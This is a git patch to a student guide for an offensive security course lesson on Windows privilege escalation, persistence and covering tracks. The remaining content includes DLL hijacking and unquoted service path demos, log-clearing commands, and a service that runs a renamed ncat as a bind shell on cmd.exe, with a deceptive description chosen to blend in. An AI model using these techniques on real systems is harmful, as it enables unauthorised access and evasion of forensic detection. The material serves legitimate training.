From a3865118178520adf99c73ee1430e75d1f61c17a Mon Sep 17 00:00:00 2001 From: CTED_Inernal_CICDryan <cted_internal@cicd.com> Date: Tue, 4 Jan 2022 18:40:48 +0000 Subject: [PATCH] Student Guides Updated --- .../pages/lesson-9-windows-exploit_sg.adoc | 69 ++----------------- 1 file changed, 5 insertions(+), 64 deletions(-) diff --git a/security/modules/lessons/pages/lesson-9-windows-exploit_sg.adoc b/security/modules/lessons/pages/lesson-9-windows-exploit_sg.adoc index dab9d0cd..70608854 100644 --- a/security/modules/lessons/pages/lesson-9-windows-exploit_sg.adoc +++ b/security/modules/lessons/pages/lesson-9-windows-exploit_sg.adoc @@ -23,32 +23,6 @@ xref:ROOT:objectives.adoc#_section_7_5_covering_tracks[Section 7.5: Covering Tra {empty} + -== Approximate Timeline - -[.standard,width="100%",options="header"] -|=== -| Day |Planned Events |Duration -| **Day 11: Windows Exploitation** |**Facilitation:** Privilege Escalation | 50 minutes -| |*Break* | 10 minutes -| |**Facilitation:** Privilege Escalation | 40 minutes -| |*Break* | 10 minutes -| |**Facilitation:** Persistence | 45 minutes -| |*Break* | 10 minutes -| |**Facilitation:** Covering Tracks | 50 minutes -| |*Break* | 10 minutes -| |**Facilitation:** Covering Tracks | 25 minutes -|=== - - -== Facilitation: Windows Privilege Escalation - -*Outcome*: - -This section facilitation provides the students the necessary concepts to perform various techniques to escalate privileges in modern Windows environments. These concepts will provide students with the knowledge necessary to perform skill 15. While various techniques will be covered in this lesson block, students are only expected to demonstrate the ability to use one of the skills to achieve escalation. - -{empty} + - - === *REVIEW: User Mode vs. Kernel Mode, Priveleged vs. Unpriveleged* Remember that x86 architecture supports four protected rings, but that most common operating systems typically only utilize Ring 0 (Kernel) and Ring 3 (usermode). This distinction enables operating systems to isolate privileged access to hardware and direct memory access from standard usermode processes. @@ -114,7 +88,6 @@ An object that describes the security context of a process or thread. The inform ** Current ``Impersonation Levels`` ** Other statistics -NOTE: No need to list off all of the contents in an access token. But it is provided for reference. Ensure students understand that access token is associated with the privileges for a user. *Privilege* + The right of an account, such as a user or group account, to perform various system-related operations on the local computer, such as shutting down the system, loading device drivers, or changing the system time. Privileges differ from access rights in two ways: + @@ -224,23 +197,6 @@ for the instructor badge? {empty} + -===== DEMO: Check UAC Settings -The following can be performed from Powershell and CMD: - -. Search bar type UAC and go to the UAC control panel -. Check the reg key for the following command: - -``reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System`` -[start=3] -. The following *Registry Key Values* are important: - -* ``EnableLUA``: -** ``0x1`` Notifications On -** ``0x0`` Notifications Off - -* ``ConsentPromptBehaviorAdmin``: -** ``0x5`` *Default Value* (admin is prompted for permit or deny through popup) - .Sources: * https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gpsb/341747f5-6b5d-4d30-85fc-fa1cc04038d4[ConsentPromptBehaviorAdmin Levels] @@ -371,7 +327,6 @@ IMPORTANT: We want to identify anything running in non-standard locations as wel ===== DEMO: DLL hijacking (Writable Path, Vulnerable Scheduled Task) -NOTE: This demo uses *CVE-2016-6167* to demonstrate how a custom DLL can be used inject arbitary code on a target machine. In this example, ``putty.exe`` looks for a DLL named ``ntmarta.dll``. It is important that they know these aren't complex Zero day attacks, but documented vulnerabilties that a system administrator can easily miss. *Process Monitor* @@ -457,8 +412,6 @@ Services in windows are actually DLL's that are loaded and executed via svchost. In this demonstration a machine is enumerated for services running from directories that a regular user can modify. If a service is found that uses a directory with poor access controls, it can be compromised to run malicious code. -NOTE: Help the Students understand various commands to find services, and what can make a service vulnerable. - {empty} + ===== DEMO: Vulnerable services (Weak Permissions) @@ -517,7 +470,6 @@ NOTE: *networkedservice2* is a malicious service, but any executable can be tran ===== DEMO: Vulnerable services (Un-quoted Paths) Services that run executables instead of DLLs via ``svchost`` are vulnerable to this. This vulnerability relies on *unquoted spaces* in the path to a ``service executable path``. Any program with this is vulnerable to ``CVE-2015-0016``. + -NOTE: In this demo, the instructor will create two services (Demo1 and Demo2). One service has correct quotations around the path, while th other is missing quotations and is vulnerable to this exploit. . Run these commands, on an Administrative command prompt, to setup for showing the defferences in the two ``sevice executable paths``: + * ``sc.exe create "Demo1" binpath= "\"C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe\"" Displayname= "Demo Service 1" start= auto`` @@ -579,6 +531,7 @@ As mentioned earlier, ``SYSTEM`` is both an integrity level and a user account. {empty} + + ===== DEMO: SYSTEM Access and Defeating Protections . Sysinternals: @@ -599,6 +552,7 @@ As mentioned earlier, ``SYSTEM`` is both an integrity level and a user account. {empty} + + ===== DEMO: User Account Control (UAC) Bypass Sometimes an auto-elevate executable can be abused to execute a command at a higher integrity level without issuing a prompt to the user. When an auto-elevate executable has such a vulnerability, it is said to be vulnerable to a UAC Bypass. *A UAC Bypass* is any technique that allows a process to execute a command at a higher integrity level without triggering a prompt or warning to the user. + @@ -801,12 +755,6 @@ Why would you want to change a timestamp? ** Calls into question the validity of a file or log ** Allows for an easy miss if looking for modified files in an entirely different time period -NOTE: Although these programs are designed to frustrate forensic analysis, it should be noted that its use can be easily detected. Because the program can delete all timestamp information, the lack of timestamp values would lead an examiner to the conclusion that something is amiss on the system. + -{empty} + -Microsoft-based Windows operating systems record at least some timestamp information. The total absence of such is a dead giveaway that a user has tried to hide something. + -{empty} + -If the values are simply changed to believable values, then there is little chance of the change(s) being noticed at a casual glance. - {empty} + ==== System Resources @@ -822,11 +770,10 @@ When evaluating resources, network usage is just as important. Network usage can * As an attacker, what resources do you want to keep track of so you don't use to much? {empty} + - ===== DEMO: Evaluating System Resources The goal is to demonstrate and identify various techniques and methods to identify how your actions may affect the target. Below are various commands that can be run to show resource usage impact. + -NOTE: Have students follow along on their Windows instance, and demonstrate some of the following commands. Ask students what the syntax is doing or what switchs to use perodically. + [source,DOS] ---- @@ -854,6 +801,8 @@ net view {empty} + + + ==== Windows Logging *Windows Audit Policies* + Auditing tracks the activity of users and processes by recording selected types of events in the logs of a server or workstation + @@ -866,7 +815,6 @@ Auditing tracks the activity of users and processes by recording selected types ===== DEMO: Audit Logging -NOTE: Have students follow along on their Windows instance, and demonstrate some of the following commands. Ask students what the syntax is doing or what switchs to use perodically. [source,DOS] ---- @@ -921,7 +869,6 @@ EventID Description ===== DEMO: Event Logging -NOTE: Have students follow along on their Windows instance, and demonstrate some of the following commands. Ask students what the syntax is doing or what switchs to use perodically. [source,dos] ---- @@ -1004,7 +951,6 @@ A software utility that allows users to performs ``Windows Management Instrument ===== DEMO: Additional Logging -NOTE: Have students follow along on their Windows instance, and demonstrate some of the following commands. Ask students what the syntax is doing or what switchs to use perodically. *Checking PowerShell logging* + @@ -1037,7 +983,6 @@ reg query hklm\software\microsoft\wbem\cimom \| findstr /i logging ===== DEMO: Manipulating Logs and Files This demonstration covers a variety of methods, which reflect interacting with, manipulting, and clearing logs and file information to aid in covering track and blending in. In particular with a Windows system, there are limitations on what can done with logs, we must understand methods to alter other data to obscure our actions. + -NOTE: Have students follow along on their Windows instance, and demonstrate some of the following commands. Ask students what the syntax is doing or what switchs to use perodically. *Manipulating Logs and Files* + @@ -1105,7 +1050,6 @@ Clear-Eventlog -Log Application, System ===== DEMO: Windows Covering Tracks with Persistance -NOTE: Using ncat in this manner will cause Windows to serve a ``FAILED 1053`` error after 30 seconds, due to ncat not calling certain APIs. This is fine as we are just demoing the concept of blending using Windows services. . Place ncat.exe inside c:\windows\system32 * ``copy "c:\users\user\setup\fetchable\ncat.exe" c:\windows\system32`` @@ -1125,9 +1069,6 @@ NOTE: Using ncat in this manner will cause Windows to serve a ``FAILED 1053`` er * ``sc create RDPlite binpath= "cmd /C c:\windows\system32\wksprtzPS.exe -lp 3399 -e cmd.exe" type= own start= auto DisplayName= "RDPlite"`` * ``sc description RDPlite "Nothing to see here I am legit"`` -IMPORTANT: Point out during the demo that the description we would want to use something to blend in better such as looking the description of the dll we are using and adding microsoft's standard error sentence, for this we will use something simple -{empty} + -Point out the listening port we choose aligns with ports used by our exe to better blend in. This dll is accocated with RDP . Verify our service configuration that it blends. NOTE the 250 on the qdescription is how many bytes to display. * ``sc qc RDPlite`` -- GitLab